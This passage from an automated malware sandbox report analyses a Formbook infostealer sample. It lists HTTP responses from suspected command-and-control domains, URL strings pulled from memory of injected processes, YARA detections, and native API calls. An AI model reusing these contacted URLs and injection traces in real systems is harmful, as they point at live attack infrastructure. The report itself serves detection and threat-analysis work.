encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:41 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3da_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 26 Sep 2024 12:26:01 GMTserver: LiteSpeedData Raw: 35 38 62 65 0d 0a f4 ff 1f 22 2a 7b 3f 9c 22 92 95 ce 1f 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d7 ac b3 bb 6a 0e f7 d7 54 b5 2d ba 01 08 00 3f 92 a9 c8 49 7f e7 9b 4d 2a 3d 99 cf b6 bd 2a 88 7c a4 d0 06 01 06 00 f5 09 87 55 7b bc ed f1 be 97 99 96 6f b1 ca 8f 7f 07 5b 1e 8f b3 6c 10 27 09 ca 92 f6 f0 ce 1e 89 9d f1 1e b7 53 0c 44 42 12 6d 88 e0 12 90 64 cd 94 ab f2 fc e5 f9 cf ff ef ef b5 af bc b0 89 a2 89 27 25 cc dc b6 25 0f 00 c7 c0 d1 86 13 dc 07 c1 7b 92 03 c9 52 00 76 20 43 60 59 5e 6b 6c ab f6 de 87 ee bb 0f 04 b6 ab 65 bb c0 54 d5 ae fa 54 dc fe 80 ae f2 6f 82 fa 3d 84 d9 04 21 ba aa 89 ea ff 01 0a 87 93 ec ca aa d5 4b fe 43 18 fe 70 d6 44 95 4e 9e f5 fe 61 f5 6f 76 f7 5f e7 10 44 e4 10 4c ab 35 19 aa fd 1e 06 63 0c 5a 48 3a 92 f6 31 2c eb da dd bf f7 77 26 22 a2 a2 22 02 69 5f c3 b7 fe f5 b6 f7 6e a6 bd ef 6e 63 00 15 95 18 44 4c 97 b1 d5 dd 67 28 51 1b 21 c8 80 19 d2 09 50 d7 57 30 1b 7b b3 7d d5 9b ef 12 b4 f4 d7 2f c9 23 25 37 f7 18 2f 93 ff 58 c0 b8 4b 8e fd ee e2 96 59 d5 e3 2e 61 96 52 82 0e 1f 45 bd 67 57 f4 1a 02 07 7a ff e7 8e 86 5a 19 dc 89 e4 f1 0f af 6e e0 3b a3 ed 0b 78 34 bb 64 f0 ae d5 06 a7 2b be 8b a1 5a ad ba 7e e8 98 f3 dd ea d2 da 95 10 c9 23 a4 15 38 3c e2 ce bb 83 8b e1 ee f3 a6 3b eb ae 9d 7f 92 c0 09 df 96 df c1 ea f1 d5 ab 9b a3 e3 cb 6b 60 7c 8b 83 8e 08 3a 80 1b a2 ee f5 ef d8 c0 59 c7 e3 e5 3f de e6 df 4e 85 08 5f 3e fd 04 e7 8c 5b 09 27 99 b1 0c 28 a0 74 c3 d5 a9 10 6f 1e c0 ab 9c 9d 6f 06 8f 21 ac c0 6f 17 56 01 dd 0a 28 7d 7c c5 fc 37 fb 59 75 08 d6 45 d8 bf eb cd 28 fc 78 85 f7 c6 75 a7 62 eb 7d 75 2e 4b cd 16 cf 69 5c ad 0c 12 f4 43 80 76 ff eb 97 04 56 49 20 37 f9 3d a8 dc b0 4c bc 8c 61 a4 6b 85 b3 18 3c 1f c4 eb 80 bb 84 af 4e 36 cd db 6f c1 59 56 03 02 ad a0 a1 3e 62 af e8 91 f5 17 93 c7 29 f9 a1 36 87 2e 31 a9 1a 16 c1 4e 63 ce 77 09 49 7e 80 7e eb ab af 53 f2 43 bc 0e 98 54 c9 3f f1 f0 45 47 4c 48 f2 83 6e d2 3e 42 db 36 e3 5c ae 77 4f bb 42 66 ec 72 fd 7d b5 78 7d ce cb 92 90 64 f4 e6 cf 54 42 92 ea b6 ab 6a ce 93 a4 c1 cf d3 da d9 b8 95 ff 74 be f9 d9 63 08 50 42 52 cf bb 9a b0 72 a7 57 28 7e 27 d4 a1 64 26 89 68 76 df d5 25 c9 ea f2 79 11 29 f2 14 92 44 e5 3b 8c 65 11 d0 ab 7c b2 d1 5f 7f 76 da c6 5a 7e 58 fe 8e fd 60 54 44 44 0e 7e 1f 76 d3 49 1f ff 52 f7 11 7d bf 0f d1 6b db cd c9 4c 92 df 46 f4 57 aa ed 30 c6 a4 4a 34 06 4a 94 27 d9 Data Ascii: 58be"*{?")/&>yjT-?IM*=*|U{o[l'SDBmd'%%{Rv C`Y^kleT
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3da_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 26 Sep 2024 12:26:06 GMTserver: LiteSpeedData Raw: 35 38 62 65 0d 0a f4 ff 1f 22 2a 7b 3f 9c 22 92 95 ce 1f 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d7 ac b3 bb 6a 0e f7 d7 54 b5 2d ba 01 08 00 3f 92 a9 c8 49 7f e7 9b 4d 2a 3d 99 cf b6 bd 2a 88 7c a4 d0 06 01 06 00 f5 09 87 55 7b bc ed f1 be 97 99 96 6f b1 ca 8f 7f 07 5b 1e 8f b3 6c 10 27 09 ca 92 f6 f0 ce 1e 89 9d f1 1e b7 53 0c 44 42 12 6d 88 e0 12 90 64 cd 94 ab f2 fc e5 f9 cf ff ef ef b5 af bc b0 89 a2 89 27 25 cc dc b6 25 0f 00 c7 c0 d1 86 13 dc 07 c1 7b 92 03 c9 52 00 76 20 43 60 59 5e 6b 6c ab f6 de 87 ee bb 0f 04 b6 ab 65 bb c0 54 d5 ae fa 54 dc fe 80 ae f2 6f 82 fa 3d 84 d9 04 21 ba aa 89 ea ff 01 0a 87 93 ec ca aa d5 4b fe 43 18 fe 70 d6 44 95 4e 9e f5 fe 61 f5 6f 76 f7 5f e7 10 44 e4 10 4c ab 35 19 aa fd 1e 06 63 0c 5a 48 3a 92 f6 31 2c eb da dd bf f7 77 26 22 a2 a2 22 02 69 5f c3 b7 fe f5 b6 f7 6e a6 bd ef 6e 63 00 15 95 18 44 4c 97 b1 d5 dd 67 28 51 1b 21 c8 80 19 d2 09 50 d7 57 30 1b 7b b3 7d d5 9b ef 12 b4 f4 d7 2f c9 23 25 37 f7 18 2f 93 ff 58 c0 b8 4b 8e fd ee e2 96 59 d5 e3 2e 61 96 52 82 0e 1f 45 bd 67 57 f4 1a 02 07 7a ff e7 8e 86 5a 19 dc 89 e4 f1 0f af 6e e0 3b a3 ed 0b 78 34 bb 64 f0 ae d5 06 a7 2b be 8b a1 5a ad ba 7e e8 98 f3 dd ea d2 da 95 10 c9 23 a4 15 38 3c e2 ce bb 83 8b e1 ee f3 a6 3b eb ae 9d 7f 92 c0 09 df 96 df c1 ea f1 d5 ab 9b a3 e3 cb 6b 60 7c 8b 83 8e 08 3a 80 1b a2 ee f5 ef d8 c0 59 c7 e3 e5 3f de e6 df 4e 85 08 5f 3e fd 04 e7 8c 5b 09 27 99 b1 0c 28 a0 74 c3 d5 a9 10 6f 1e c0 ab 9c 9d 6f 06 8f 21 ac c0 6f 17 56 01 dd 0a 28 7d 7c c5 fc 37 fb 59 75 08 d6 45 d8 bf eb cd 28 fc 78 85 f7 c6 75 a7 62 eb 7d 75 2e 4b cd 16 cf 69 5c ad 0c 12 f4 43 80 76 ff eb 97 04 56 49 20 37 f9 3d a8 dc b0 4c bc 8c 61 a4 6b 85 b3 18 3c 1f c4 eb 80 bb 84 af 4e 36 cd db 6f c1 59 56 03 02 ad a0 a1 3e 62 af e8 91 f5 17 93 c7 29 f9 a1 36 87 2e 31 a9 1a 16 c1 4e 63 ce 77 09 49 7e 80 7e eb ab af 53 f2 43 bc 0e 98 54 c9 3f f1 f0 45 47 4c 48 f2 83 6e d2 3e 42 db 36 e3 5c ae 77 4f bb 42 66 ec 72 fd 7d b5 78 7d ce cb 92 90 64 f4 e6 cf 54 42 92 ea b6 ab 6a ce 93 a4 c1 cf d3 da d9 b8 95 ff 74 be f9 d9 63 08 50 42 52 cf bb 9a b0 72 a7 57 28 7e 27 d4 a1 64 26 89 68 76 df d5 25 c9 ea f2 79 11 29 f2 14 92 44 e5 3b 8c 65 11 d0 ab 7c b2 d1 5f 7f 76 da c6 5a 7e 58 fe 8e fd 60 54 44 44 0e 7e 1f 76 d3 49 1f ff 52 f7 11 7d bf 0f d1 6b db cd c9 4c 92 df 46 f4 57 aa ed 30 c6 a4 4a 34 06 4a 94 27 d9 Data Ascii: 58be"*{?")/&>yjT-?IM*=*|U{o[l'SDBmd'%%{Rv C`Y^kleT
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 26 Sep 2024 12:26:22 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-26T12:26:27.1552475Z

Source: auditpol.exe, 0000000A.00000002.4130231943.0000000004FE8000.00000004.10000000.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129772358.00000000039F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://inf30027group23.xyz/ljdj/?sL9tFJ=ZICPfDYGGExxFAxCww1xwUjvDbJY85yXQI6dp2kJB8RnqeyNXlFMy7FVDhew
Source: auditpol.exe, 0000000A.00000002.4130231943.000000000467C000.00000004.10000000.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129772358.000000000308C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://newdaydawning.net/paa2/?sL9tFJ=n7l4pK2vJUox4BGRRaSHHdo
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: auditpol.exe, 0000000A.00000002.4130231943.0000000004B32000.00000004.10000000.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129772358.0000000003542000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?sL9tFJ=kPi1sGtrrK6MgvdeecyTfrcQSpO0wr028E
Source: uIklAoJgpkP.exe, 0000000B.00000002.4131269057.0000000004AE2000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.x100.shop
Source: uIklAoJgpkP.exe, 0000000B.00000002.4131269057.0000000004AE2000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.x100.shop/uaxy/
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: auditpol.exe, 0000000A.00000003.2190222583.0000000007F7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Source: Yara match	File source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0042C783 NtClose,		1_2_0042C783
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB35C0 NtCreateMutant,LdrInitializeThunk,		1_2_02EB35C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2B60 NtClose,LdrInitializeThunk,		1_2_02EB2B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2C70 NtFreeVirtualMemory,LdrInitializeThunk,		1_2_02EB2C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2DF0 NtQuerySystemInformation,LdrInitializeThunk,		1_2_02EB2DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB4340 NtSetContextThread,		1_2_02EB4340
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB3090 NtSetValueKey,		1_2_02EB3090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB3010 NtOpenDirectoryObject,		1_2_02EB3010
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB4650 NtSuspendThread,		1_2_02EB4650
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2AF0 NtWriteFile,		1_2_02EB2AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2AD0 NtReadFile,		1_2_02EB2AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2AB0 NtWaitForSingleObject,		1_2_02EB2AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2BE0 NtQueryValueKey,		1_2_02EB2BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2BF0 NtAllocateVirtualMemory,		1_2_02EB2BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2BA0 NtEnumerateValueKey,		1_2_02EB2BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2B80 NtQueryInformationFile,		1_2_02EB2B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB39B0 NtGetContextThread,		1_2_02EB39B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2EE0 NtQueueApcThread,		1_2_02EB2EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2EA0 NtAdjustPrivilegesToken,		1_2_02EB2EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2E80 NtReadVirtualMemory,		1_2_02EB2E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2E30 NtWriteVirtualMemory,		1_2_02EB2E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2FE0 NtCreateFile,		1_2_02EB2FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2FA0 NtQuerySection,		1_2_02EB2FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2FB0 NtResumeThread,		1_2_02EB2FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2F90 NtProtectVirtualMemory,		1_2_02EB2F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2F60 NtCreateProcessEx,		1_2_02EB2F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2F30 NtCreateSection,		1_2_02EB2F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2CF0 NtOpenProcess,		1_2_02EB2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2CC0 NtQueryVirtualMemory,		1_2_02EB2CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2CA0 NtQueryInformationToken,		1_2_02EB2CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2C60 NtCreateKey,		1_2_02EB2C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2C00 NtQueryInformationProcess,		1_2_02EB2C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2DD0 NtDelayExecution,		1_2_02EB2DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2DB0 NtEnumerateKey,		1_2_02EB2DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB3D70 NtOpenThread,		1_2_02EB3D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2D30 NtUnmapViewOfSection,		1_2_02EB2D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2D00 NtSetInformationFile,		1_2_02EB2D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2D10 NtMapViewOfSection,		1_2_02EB2D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB3D10 NtOpenProcessToken,		1_2_02EB3D10
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03694340 NtSetContextThread,LdrInitializeThunk,		10_2_03694340
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03694650 NtSuspendThread,LdrInitializeThunk,		10_2_03694650
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036935C0 NtCreateMutant,LdrInitializeThunk,		10_2_036935C0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692B60 NtClose,LdrInitializeThunk,		10_2_03692B60
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692BE0 NtQueryValueKey,LdrInitializeThunk,		10_2_03692BE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692BF0 NtAllocateVirtualMemory,LdrInitializeThunk,		10_2_03692BF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692BA0 NtEnumerateValueKey,LdrInitializeThunk,		10_2_03692BA0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692AF0 NtWriteFile,LdrInitializeThunk,		10_2_03692AF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692AD0 NtReadFile,LdrInitializeThunk,		10_2_03692AD0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036939B0 NtGetContextThread,LdrInitializeThunk,		10_2_036939B0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692F30 NtCreateSection,LdrInitializeThunk,		10_2_03692F30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692FE0 NtCreateFile,LdrInitializeThunk,		10_2_03692FE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692FB0 NtResumeThread,LdrInitializeThunk,		10_2_03692FB0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692EE0 NtQueueApcThread,LdrInitializeThunk,		10_2_03692EE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692E80 NtReadVirtualMemory,LdrInitializeThunk,		10_2_03692E80
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692D30 NtUnmapViewOfSection,LdrInitializeThunk,		10_2_03692D30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692D10 NtMapViewOfSection,LdrInitializeThunk,		10_2_03692D10
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692DF0 NtQuerySystemInformation,LdrInitializeThunk,		10_2_03692DF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692DD0 NtDelayExecution,LdrInitializeThunk,		10_2_03692DD0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692C60 NtCreateKey,LdrInitializeThunk,		10_2_03692C60
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692C70 NtFreeVirtualMemory,LdrInitializeThunk,		10_2_03692C70
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692CA0 NtQueryInformationToken,LdrInitializeThunk,		10_2_03692CA0
